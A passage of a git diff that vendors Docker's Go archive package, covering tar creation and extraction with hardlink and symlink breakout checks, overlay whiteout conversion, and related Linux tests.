+	case tar.TypeBlock, tar.TypeChar:
+		if inUserns { // cannot create devices in a userns
+			return nil
+		}
+		// Handle this is an OS-specific way
+		if err := handleTarTypeBlockCharFifo(hdr, path); err != nil {
+			return err
+		}
+
+	case tar.TypeFifo:
+		// Handle this is an OS-specific way
+		if err := handleTarTypeBlockCharFifo(hdr, path); err != nil {
+			return err
+		}
+
+	case tar.TypeLink:
+		targetPath := filepath.Join(extractDir, hdr.Linkname)
+		// check for hardlink breakout
+		if !strings.HasPrefix(targetPath, extractDir) {
+			return breakoutError(fmt.Errorf("invalid hardlink %q -> %q", targetPath, hdr.Linkname))
+		}
+		if err := os.Link(targetPath, path); err != nil {
+			return err
+		}
+
+	case tar.TypeSymlink:
+		// 	path 				-> hdr.Linkname = targetPath
+		// e.g. /extractDir/path/to/symlink 	-> ../2/file	= /extractDir/path/2/file
+		targetPath := filepath.Join(filepath.Dir(path), hdr.Linkname)
+
+		// the reason we don't need to check symlinks in the path (with FollowSymlinkInScope) is because
+		// that symlink would first have to be created, which would be caught earlier, at this very check:
+		if !strings.HasPrefix(targetPath, extractDir) {
+			return breakoutError(fmt.Errorf("invalid symlink %q -> %q", path, hdr.Linkname))
+		}
+		if err := os.Symlink(hdr.Linkname, path); err != nil {
+			return err
+		}
+
+	case tar.TypeXGlobalHeader:
+		logrus.Debug("PAX Global Extended Headers found and ignored")
+		return nil
+
+	default:
+		return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag)
+	}
+
+	// Lchown is not supported on Windows.
+	if Lchown && runtime.GOOS != "windows" {
+		if chownOpts == nil {
+			chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid}
+		}
+		if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil {
+			return err
+		}
+	}
+
+	var errors []string
+	for key, value := range hdr.Xattrs {
+		if err := system.Lsetxattr(path, key, []byte(value), 0); err != nil {
+			if err == syscall.ENOTSUP {
+				// We ignore errors here because not all graphdrivers support
+				// xattrs *cough* old versions of AUFS *cough*. However only
+				// ENOTSUP should be emitted in that case, otherwise we still
+				// bail.
+				errors = append(errors, err.Error())
+				continue
+			}
+			return err
+		}
+
+	}
+
+	if len(errors) > 0 {
+		logrus.WithFields(logrus.Fields{
+			"errors": errors,
+		}).Warn("ignored xattrs in archive: underlying filesystem doesn't support them")
+	}
+
+	// There is no LChmod, so ignore mode for symlink. Also, this
+	// must happen after chown, as that can modify the file mode
+	if err := handleLChmod(hdr, path, hdrInfo); err != nil {
+		return err
+	}
+
+	aTime := hdr.AccessTime
+	if aTime.Before(hdr.ModTime) {
+		// Last access time should never be before last modified time.
+		aTime = hdr.ModTime
+	}
+
+	// system.Chtimes doesn't support a NOFOLLOW flag atm
+	if hdr.Typeflag == tar.TypeLink {
+		if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) {
+			if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil {
+				return err
+			}
+		}
+	} else if hdr.Typeflag != tar.TypeSymlink {
+		if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil {
+			return err
+		}
+	} else {
+		ts := []syscall.Timespec{timeToTimespec(aTime), timeToTimespec(hdr.ModTime)}
+		if err := system.LUtimesNano(path, ts); err != nil && err != system.ErrNotSupportedPlatform {
+			return err
+		}
+	}
+	return nil
+}
+
+// Tar creates an archive from the directory at `path`, and returns it as a
+// stream of bytes.
+func Tar(path string, compression Compression) (io.ReadCloser, error) {
+	return TarWithOptions(path, &TarOptions{Compression: compression})
+}
+
+// TarWithOptions creates an archive from the directory at `path`, only including files whose relative
+// paths are included in `options.IncludeFiles` (if non-nil) or not in `options.ExcludePatterns`.
+func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) {
+
+	// Fix the source path to work with long path names. This is a no-op
+	// on platforms other than Windows.
+	srcPath = fixVolumePathPrefix(srcPath)
+
+	patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns)
+
+	if err != nil {
+		return nil, err
+	}
+
+	pipeReader, pipeWriter := io.Pipe()
+
+	compressWriter, err := CompressStream(pipeWriter, options.Compression)
+	if err != nil {
+		return nil, err
+	}
+
+	go func() {
+		ta := &tarAppender{
+			TarWriter:         tar.NewWriter(compressWriter),
+			Buffer:            pools.BufioWriter32KPool.Get(nil),
+			SeenFiles:         make(map[uint64]string),
+			UIDMaps:           options.UIDMaps,
+			GIDMaps:           options.GIDMaps,
+			WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat),
+		}
+
+		defer func() {
+			// Make sure to check the error on Close.
+			if err := ta.TarWriter.Close(); err != nil {
+				logrus.Errorf("Can't close tar writer: %s", err)
+			}
+			if err := compressWriter.Close(); err != nil {
+				logrus.Errorf("Can't close compress writer: %s", err)
+			}
+			if err := pipeWriter.Close(); err != nil {
+				logrus.Errorf("Can't close pipe writer: %s", err)
+			}
+		}()
+
+		// this buffer is needed for the duration of this piped stream
+		defer pools.BufioWriter32KPool.Put(ta.Buffer)
+
+		// In general we log errors here but ignore them because
+		// during e.g. a diff operation the container can continue
+		// mutating the filesystem and we can see transient errors
+		// from this
+
+		stat, err := os.Lstat(srcPath)
+		if err != nil {
+			return
+		}
+
+		if !stat.IsDir() {
+			// We can't later join a non-dir with any includes because the
+			// 'walk' will error if "file/." is stat-ed and "file" is not a
+			// directory. So, we must split the source path and use the
+			// basename as the include.
+			if len(options.IncludeFiles) > 0 {
+				logrus.Warn("Tar: Can't archive a file with includes")
+			}
+
+			dir, base := SplitPathDirEntry(srcPath)
+			srcPath = dir
+			options.IncludeFiles = []string{base}
+		}
+
+		if len(options.IncludeFiles) == 0 {
+			options.IncludeFiles = []string{"."}
+		}
+
+		seen := make(map[string]bool)
+
+		for _, include := range options.IncludeFiles {
+			rebaseName := options.RebaseNames[include]
+
+			walkRoot := getWalkRoot(srcPath, include)
+			filepath.Walk(walkRoot, func(filePath string, f os.FileInfo, err error) error {
+				if err != nil {
+					logrus.Errorf("Tar: Can't stat file %s to tar: %s", srcPath, err)
+					return nil
+				}
+
+				relFilePath, err := filepath.Rel(srcPath, filePath)
+				if err != nil || (!options.IncludeSourceDir && relFilePath == "." && f.IsDir()) {
+					// Error getting relative path OR we are looking
+					// at the source directory path. Skip in both situations.
+					return nil
+				}
+
+				if options.IncludeSourceDir && include == "." && relFilePath != "." {
+					relFilePath = strings.Join([]string{".", relFilePath}, string(filepath.Separator))
+				}
+
+				skip := false
+
+				// If "include" is an exact match for the current file
+				// then even if there's an "excludePatterns" pattern that
+				// matches it, don't skip it. IOW, assume an explicit 'include'
+				// is asking for that file no matter what - which is true
+				// for some files, like .dockerignore and Dockerfile (sometimes)
+				if include != relFilePath {
+					skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs)
+					if err != nil {
+						logrus.Errorf("Error matching %s: %v", relFilePath, err)
+						return err
+					}
+				}
+
+				if skip {
+					// If we want to skip this file and its a directory
+					// then we should first check to see if there's an
+					// excludes pattern (eg !dir/file) that starts with this
+					// dir. If so then we can't skip this dir.
+
+					// Its not a dir then so we can just return/skip.
+					if !f.IsDir() {
+						return nil
+					}
+
+					// No exceptions (!...) in patterns so just skip dir
+					if !exceptions {
+						return filepath.SkipDir
+					}
+
+					dirSlash := relFilePath + string(filepath.Separator)
+
+					for _, pat := range patterns {
+						if pat[0] != '!' {
+							continue
+						}
+						pat = pat[1:] + string(filepath.Separator)
+						if strings.HasPrefix(pat, dirSlash) {
+							// found a match - so can't skip this dir
+							return nil
+						}
+					}
+
+					// No matching exclusion dir so just skip dir
+					return filepath.SkipDir
+				}
+
+				if seen[relFilePath] {
+					return nil
+				}
+				seen[relFilePath] = true
+
+				// Rename the base resource.
+				if rebaseName != "" {
+					var replacement string
+					if rebaseName != string(filepath.Separator) {
+						// Special case the root directory to replace with an
+						// empty string instead so that we don't end up with
+						// double slashes in the paths.
+						replacement = rebaseName
+					}
+
+					relFilePath = strings.Replace(relFilePath, include, replacement, 1)
+				}
+
+				if err := ta.addTarFile(filePath, relFilePath); err != nil {
+					logrus.Errorf("Can't add file %s to tar: %s", filePath, err)
+					// if pipe is broken, stop writing tar stream to it
+					if err == io.ErrClosedPipe {
+						return err
+					}
+				}
+				return nil
+			})
+		}
+	}()
+
+	return pipeReader, nil
+}
+
+// Unpack unpacks the decompressedArchive to dest with options.
+func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) error {
+	tr := tar.NewReader(decompressedArchive)
+	trBuf := pools.BufioReader32KPool.Get(nil)
+	defer pools.BufioReader32KPool.Put(trBuf)
+
+	var dirs []*tar.Header
+	remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
+	if err != nil {
+		return err
+	}
+	whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat)
+
+	// Iterate through the files in the archive.
+loop:
+	for {
+		hdr, err := tr.Next()
+		if err == io.EOF {
+			// end of tar archive
+			break
+		}
+		if err != nil {
+			return err
+		}
+
+		// Normalize name, for safety and for a simple is-root check
+		// This keeps "../" as-is, but normalizes "/../" to "/". Or Windows:
+		// This keeps "..\" as-is, but normalizes "\..\" to "\".
+		hdr.Name = filepath.Clean(hdr.Name)
+
+		for _, exclude := range options.ExcludePatterns {
+			if strings.HasPrefix(hdr.Name, exclude) {
+				continue loop
+			}
+		}
+
+		// After calling filepath.Clean(hdr.Name) above, hdr.Name will now be in
+		// the filepath format for the OS on which the daemon is running. Hence
+		// the check for a slash-suffix MUST be done in an OS-agnostic way.
+		if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) {
+			// Not the root directory, ensure that the parent directory exists
+			parent := filepath.Dir(hdr.Name)
+			parentPath := filepath.Join(dest, parent)
+			if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) {
+				err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID)
+				if err != nil {
+					return err
+				}
+			}
+		}
+
+		path := filepath.Join(dest, hdr.Name)
+		rel, err := filepath.Rel(dest, path)
+		if err != nil {
+			return err
+		}
+		if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) {
+			return breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest))
+		}
+
+		// If path exits we almost always just want to remove and replace it
+		// The only exception is when it is a directory *and* the file from
+		// the layer is also a directory. Then we want to merge them (i.e.
+		// just apply the metadata from the layer).
+		if fi, err := os.Lstat(path); err == nil {
+			if options.NoOverwriteDirNonDir && fi.IsDir() && hdr.Typeflag != tar.TypeDir {
+				// If NoOverwriteDirNonDir is true then we cannot replace
+				// an existing directory with a non-directory from the archive.
+				return fmt.Errorf("cannot overwrite directory %q with non-directory %q", path, dest)
+			}
+
+			if options.NoOverwriteDirNonDir && !fi.IsDir() && hdr.Typeflag == tar.TypeDir {
+				// If NoOverwriteDirNonDir is true then we cannot replace
+				// an existing non-directory with a directory from the archive.
+				return fmt.Errorf("cannot overwrite non-directory %q with directory %q", path, dest)
+			}
+
+			if fi.IsDir() && hdr.Name == "." {
+				continue
+			}
+
+			if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) {
+				if err := os.RemoveAll(path); err != nil {
+					return err
+				}
+			}
+		}
+		trBuf.Reset(tr)
+
+		// if the options contain a uid & gid maps, convert header uid/gid
+		// entries using the maps such that lchown sets the proper mapped
+		// uid/gid after writing the file. We only perform this mapping if
+		// the file isn't already owned by the remapped root UID or GID, as
+		// that specific uid/gid has no mapping from container -> host, and
+		// those files already have the proper ownership for inside the
+		// container.
+		if hdr.Uid != remappedRootUID {
+			xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps)
+			if err != nil {
+				return err
+			}
+			hdr.Uid = xUID
+		}
+		if hdr.Gid != remappedRootGID {
+			xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps)
+			if err != nil {
+				return err
+			}
+			hdr.Gid = xGID
+		}
+
+		if whiteoutConverter != nil {
+			writeFile, err := whiteoutConverter.ConvertRead(hdr, path)
+			if err != nil {
+				return err
+			}
+			if !writeFile {
+				continue
+			}
+		}
+
+		if err := createTarFile(path, dest, hdr, trBuf, !options.NoLchown, options.ChownOpts, options.InUserNS); err != nil {
+			return err
+		}
+
+		// Directory mtimes must be handled at the end to avoid further
+		// file creation in them to modify the directory mtime
+		if hdr.Typeflag == tar.TypeDir {
+			dirs = append(dirs, hdr)
+		}
+	}
+
+	for _, hdr := range dirs {
+		path := filepath.Join(dest, hdr.Name)
+
+		if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// Untar reads a stream of bytes from `archive`, parses it as a tar archive,
+// and unpacks it into the directory at `dest`.
+// The archive may be compressed with one of the following algorithms:
+//  identity (uncompressed), gzip, bzip2, xz.
+// FIXME: specify behavior when target path exists vs. doesn't exist.
+func Untar(tarArchive io.Reader, dest string, options *TarOptions) error {
+	return untarHandler(tarArchive, dest, options, true)
+}
+
+// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive,
+// and unpacks it into the directory at `dest`.
+// The archive must be an uncompressed stream.
+func UntarUncompressed(tarArchive io.Reader, dest string, options *TarOptions) error {
+	return untarHandler(tarArchive, dest, options, false)
+}
+
+// Handler for teasing out the automatic decompression
+func untarHandler(tarArchive io.Reader, dest string, options *TarOptions, decompress bool) error {
+	if tarArchive == nil {
+		return fmt.Errorf("Empty archive")
+	}
+	dest = filepath.Clean(dest)
+	if options == nil {
+		options = &TarOptions{}
+	}
+	if options.ExcludePatterns == nil {
+		options.ExcludePatterns = []string{}
+	}
+
+	r := tarArchive
+	if decompress {
+		decompressedArchive, err := DecompressStream(tarArchive)
+		if err != nil {
+			return err
+		}
+		defer decompressedArchive.Close()
+		r = decompressedArchive
+	}
+
+	return Unpack(r, dest, options)
+}
+
+// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
+// If either Tar or Untar fails, TarUntar aborts and returns the error.
+func (archiver *Archiver) TarUntar(src, dst string) error {
+	logrus.Debugf("TarUntar(%s %s)", src, dst)
+	archive, err := TarWithOptions(src, &TarOptions{Compression: Uncompressed})
+	if err != nil {
+		return err
+	}
+	defer archive.Close()
+
+	var options *TarOptions
+	if archiver.UIDMaps != nil || archiver.GIDMaps != nil {
+		options = &TarOptions{
+			UIDMaps: archiver.UIDMaps,
+			GIDMaps: archiver.GIDMaps,
+		}
+	}
+	return archiver.Untar(archive, dst, options)
+}
+
+// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
+// If either Tar or Untar fails, TarUntar aborts and returns the error.
+func TarUntar(src, dst string) error {
+	return defaultArchiver.TarUntar(src, dst)
+}
+
+// UntarPath untar a file from path to a destination, src is the source tar file path.
+func (archiver *Archiver) UntarPath(src, dst string) error {
+	archive, err := os.Open(src)
+	if err != nil {
+		return err
+	}
+	defer archive.Close()
+	var options *TarOptions
+	if archiver.UIDMaps != nil || archiver.GIDMaps != nil {
+		options = &TarOptions{
+			UIDMaps: archiver.UIDMaps,
+			GIDMaps: archiver.GIDMaps,
+		}
+	}
+	return archiver.Untar(archive, dst, options)
+}
+
+// UntarPath is a convenience function which looks for an archive
+// at filesystem path `src`, and unpacks it at `dst`.
+func UntarPath(src, dst string) error {
+	return defaultArchiver.UntarPath(src, dst)
+}
+
+// CopyWithTar creates a tar archive of filesystem path `src`, and
+// unpacks it at filesystem path `dst`.
+// The archive is streamed directly with fixed buffering and no
+// intermediary disk IO.
+func (archiver *Archiver) CopyWithTar(src, dst string) error {
+	srcSt, err := os.Stat(src)
+	if err != nil {
+		return err
+	}
+	if !srcSt.IsDir() {
+		return archiver.CopyFileWithTar(src, dst)
+	}
+
+	// if this archiver is set up with ID mapping we need to create
+	// the new destination directory with the remapped root UID/GID pair
+	// as owner
+	rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps)
+	if err != nil {
+		return err
+	}
+	// Create dst, copy src's content into it
+	logrus.Debugf("Creating dest directory: %s", dst)
+	if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil {
+		return err
+	}
+	logrus.Debugf("Calling TarUntar(%s, %s)", src, dst)
+	return archiver.TarUntar(src, dst)
+}
+
+// CopyWithTar creates a tar archive of filesystem path `src`, and
+// unpacks it at filesystem path `dst`.
+// The archive is streamed directly with fixed buffering and no
+// intermediary disk IO.
+func CopyWithTar(src, dst string) error {
+	return defaultArchiver.CopyWithTar(src, dst)
+}
+
+// CopyFileWithTar emulates the behavior of the 'cp' command-line
+// for a single file. It copies a regular file from path `src` to
+// path `dst`, and preserves all its metadata.
+func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) {
+	logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst)
+	srcSt, err := os.Stat(src)
+	if err != nil {
+		return err
+	}
+
+	if srcSt.IsDir() {
+		return fmt.Errorf("Can't copy a directory")
+	}
+
+	// Clean up the trailing slash. This must be done in an operating
+	// system specific manner.
+	if dst[len(dst)-1] == os.PathSeparator {
+		dst = filepath.Join(dst, filepath.Base(src))
+	}
+	// Create the holding directory if necessary
+	if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil {
+		return err
+	}
+
+	r, w := io.Pipe()
+	errC := promise.Go(func() error {
+		defer w.Close()
+
+		srcF, err := os.Open(src)
+		if err != nil {
+			return err
+		}
+		defer srcF.Close()
+
+		hdr, err := tar.FileInfoHeader(srcSt, "")
+		if err != nil {
+			return err
+		}
+		hdr.Name = filepath.Base(dst)
+		hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
+
+		remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps)
+		if err != nil {
+			return err
+		}
+
+		// only perform mapping if the file being copied isn't already owned by the
+		// uid or gid of the remapped root in the container
+		if remappedRootUID != hdr.Uid {
+			xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps)
+			if err != nil {
+				return err
+			}
+			hdr.Uid = xUID
+		}
+		if remappedRootGID != hdr.Gid {
+			xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps)
+			if err != nil {
+				return err
+			}
+			hdr.Gid = xGID
+		}
+
+		tw := tar.NewWriter(w)
+		defer tw.Close()
+		if err := tw.WriteHeader(hdr); err != nil {
+			return err
+		}
+		if _, err := io.Copy(tw, srcF); err != nil {
+			return err
+		}
+		return nil
+	})
+	defer func() {
+		if er := <-errC; err == nil && er != nil {
+			err = er
+		}
+	}()
+
+	err = archiver.Untar(r, filepath.Dir(dst), nil)
+	if err != nil {
+		r.CloseWithError(err)
+	}
+	return err
+}
+
+// CopyFileWithTar emulates the behavior of the 'cp' command-line
+// for a single file. It copies a regular file from path `src` to
+// path `dst`, and preserves all its metadata.
+//
+// Destination handling is in an operating specific manner depending
+// where the daemon is running. If `dst` ends with a trailing slash
+// the final destination path will be `dst/base(src)`  (Linux) or
+// `dst\base(src)` (Windows).
+func CopyFileWithTar(src, dst string) (err error) {
+	return defaultArchiver.CopyFileWithTar(src, dst)
+}
+
+// cmdStream executes a command, and returns its stdout as a stream.
+// If the command fails to run or doesn't complete successfully, an error
+// will be returned, including anything written on stderr.
+func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) {
+	chdone := make(chan struct{})
+	cmd.Stdin = input
+	pipeR, pipeW := io.Pipe()
+	cmd.Stdout = pipeW
+	var errBuf bytes.Buffer
+	cmd.Stderr = &errBuf
+
+	// Run the command and return the pipe
+	if err := cmd.Start(); err != nil {
+		return nil, nil, err
+	}
+
+	// Copy stdout to the returned pipe
+	go func() {
+		if err := cmd.Wait(); err != nil {
+			pipeW.CloseWithError(fmt.Errorf("%s: %s", err, errBuf.String()))
+		} else {
+			pipeW.Close()
+		}
+		close(chdone)
+	}()
+
+	return pipeR, chdone, nil
+}
+
+// NewTempArchive reads the content of src into a temporary file, and returns the contents
+// of that file as an archive. The archive can only be read once - as soon as reading completes,
+// the file will be deleted.
+func NewTempArchive(src io.Reader, dir string) (*TempArchive, error) {
+	f, err := ioutil.TempFile(dir, "")
+	if err != nil {
+		return nil, err
+	}
+	if _, err := io.Copy(f, src); err != nil {
+		return nil, err
+	}
+	if _, err := f.Seek(0, 0); err != nil {
+		return nil, err
+	}
+	st, err := f.Stat()
+	if err != nil {
+		return nil, err
+	}
+	size := st.Size()
+	return &TempArchive{File: f, Size: size}, nil
+}
+
+// TempArchive is a temporary archive. The archive can only be read once - as soon as reading completes,
+// the file will be deleted.
+type TempArchive struct {
+	*os.File
+	Size   int64 // Pre-computed from Stat().Size() as a convenience
+	read   int64
+	closed bool
+}
+
+// Close closes the underlying file if it's still open, or does a no-op
+// to allow callers to try to close the TempArchive multiple times safely.
+func (archive *TempArchive) Close() error {
+	if archive.closed {
+		return nil
+	}
+
+	archive.closed = true
+
+	return archive.File.Close()
+}
+
+func (archive *TempArchive) Read(data []byte) (int, error) {
+	n, err := archive.File.Read(data)
+	archive.read += int64(n)
+	if err != nil || archive.read == archive.Size {
+		archive.Close()
+		os.Remove(archive.File.Name())
+	}
+	return n, err
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go
new file mode 100644
index 0000000000..6b2a31ff1f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go
@@ -0,0 +1,95 @@
+package archive
+
+import (
+	"archive/tar"
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter {
+	if format == OverlayWhiteoutFormat {
+		return overlayWhiteoutConverter{}
+	}
+	return nil
+}
+
+type overlayWhiteoutConverter struct{}
+
+func (overlayWhiteoutConverter) ConvertWrite(hdr *tar.Header, path string, fi os.FileInfo) (wo *tar.Header, err error) {
+	// convert whiteouts to AUFS format
+	if fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0 {
+		// we just rename the file and make it normal
+		dir, filename := filepath.Split(hdr.Name)
+		hdr.Name = filepath.Join(dir, WhiteoutPrefix+filename)
+		hdr.Mode = 0600
+		hdr.Typeflag = tar.TypeReg
+		hdr.Size = 0
+	}
+
+	if fi.Mode()&os.ModeDir != 0 {
+		// convert opaque dirs to AUFS format by writing an empty file with the prefix
+		opaque, err := system.Lgetxattr(path, "trusted.overlay.opaque")
+		if err != nil {
+			return nil, err
+		}
+		if len(opaque) == 1 && opaque[0] == 'y' {
+			if hdr.Xattrs != nil {
+				delete(hdr.Xattrs, "trusted.overlay.opaque")
+			}
+
+			// create a header for the whiteout file
+			// it should inherit some properties from the parent, but be a regular file
+			wo = &tar.Header{
+				Typeflag:   tar.TypeReg,
+				Mode:       hdr.Mode & int64(os.ModePerm),
+				Name:       filepath.Join(hdr.Name, WhiteoutOpaqueDir),
+				Size:       0,
+				Uid:        hdr.Uid,
+				Uname:      hdr.Uname,
+				Gid:        hdr.Gid,
+				Gname:      hdr.Gname,
+				AccessTime: hdr.AccessTime,
+				ChangeTime: hdr.ChangeTime,
+			}
+		}
+	}
+
+	return
+}
+
+func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, error) {
+	base := filepath.Base(path)
+	dir := filepath.Dir(path)
+
+	// if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay
+	if base == WhiteoutOpaqueDir {
+		if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil {
+			return false, err
+		}
+
+		// don't write the file itself
+		return false, nil
+	}
+
+	// if a file was deleted and we are using overlay, we need to create a character device
+	if strings.HasPrefix(base, WhiteoutPrefix) {
+		originalBase := base[len(WhiteoutPrefix):]
+		originalPath := filepath.Join(dir, originalBase)
+
+		if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil {
+			return false, err
+		}
+		if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil {
+			return false, err
+		}
+
+		// don't write the file itself
+		return false, nil
+	}
+
+	return true, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
new file mode 100644
index 0000000000..d5f046e9df
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
@@ -0,0 +1,187 @@
+package archive
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"syscall"
+	"testing"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// setupOverlayTestDir creates files in a directory with overlay whiteouts
+// Tree layout
+// .
+// ├── d1     # opaque, 0700
+// │   └── f1 # empty file, 0600
+// ├── d2     # opaque, 0750
+// │   └── f1 # empty file, 0660
+// └── d3     # 0700
+//     └── f1 # whiteout, 0644
+func setupOverlayTestDir(t *testing.T, src string) {
+	// Create opaque directory containing single file and permission 0700
+	if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create another opaque directory containing single file but with permission 0750
+	if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create regular directory with deleted file
+	if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func checkOpaqueness(t *testing.T, path string, opaque string) {
+	xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(xattrOpaque) != opaque {
+		t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque)
+	}
+
+}
+
+func checkOverlayWhiteout(t *testing.T, path string) {
+	stat, err := os.Stat(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	statT, ok := stat.Sys().(*syscall.Stat_t)
+	if !ok {
+		t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", stat.Sys())
+	}
+	if statT.Rdev != 0 {
+		t.Fatalf("Non-zero device number for whiteout")
+	}
+}
+
+func checkFileMode(t *testing.T, path string, perm os.FileMode) {
+	stat, err := os.Stat(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if stat.Mode() != perm {
+		t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm)
+	}
+}
+
+func TestOverlayTarUntar(t *testing.T) {
+	oldmask, err := system.Umask(0)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer system.Umask(oldmask)
+
+	src, err := ioutil.TempDir("", "docker-test-overlay-tar-src")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(src)
+
+	setupOverlayTestDir(t, src)
+
+	dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dst)
+
+	options := &TarOptions{
+		Compression:    Uncompressed,
+		WhiteoutFormat: OverlayWhiteoutFormat,
+	}
+	archive, err := TarWithOptions(src, options)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer archive.Close()
+
+	if err := Untar(archive, dst, options); err != nil {
+		t.Fatal(err)
+	}
+
+	checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600)
+	checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660)
+	checkFileMode(t, filepath.Join(dst, "d3", "f1"), os.ModeCharDevice|os.ModeDevice)
+
+	checkOpaqueness(t, filepath.Join(dst, "d1"), "y")
+	checkOpaqueness(t, filepath.Join(dst, "d2"), "y")
+	checkOpaqueness(t, filepath.Join(dst, "d3"), "")
+	checkOverlayWhiteout(t, filepath.Join(dst, "d3", "f1"))
+}
+
+func TestOverlayTarAUFSUntar(t *testing.T) {
+	oldmask, err := system.Umask(0)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer system.Umask(oldmask)
+
+	src, err := ioutil.TempDir("", "docker-test-overlay-tar-src")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(src)
+
+	setupOverlayTestDir(t, src)
+
+	dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dst)
+
+	archive, err := TarWithOptions(src, &TarOptions{
+		Compression:    Uncompressed,
+		WhiteoutFormat: OverlayWhiteoutFormat,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer archive.Close()
+
+	if err := Untar(archive, dst, &TarOptions{
+		Compression:    Uncompressed,
+		WhiteoutFormat: AUFSWhiteoutFormat,
+	}); err != nil {
+		t.Fatal(err)
+	}
+
+	checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir)
+	checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700)
